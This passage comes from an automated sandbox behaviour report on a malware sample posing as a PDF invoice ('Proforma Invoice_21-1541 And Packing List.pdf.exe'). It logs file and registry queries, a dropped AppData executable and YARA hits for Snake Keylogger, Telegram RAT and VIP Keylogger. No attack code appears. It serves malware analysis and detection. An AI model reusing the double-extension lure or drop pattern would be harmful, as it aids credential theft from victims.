                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 7576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 8080, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vrhZELiHpiub.exe PID: 7364, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPE
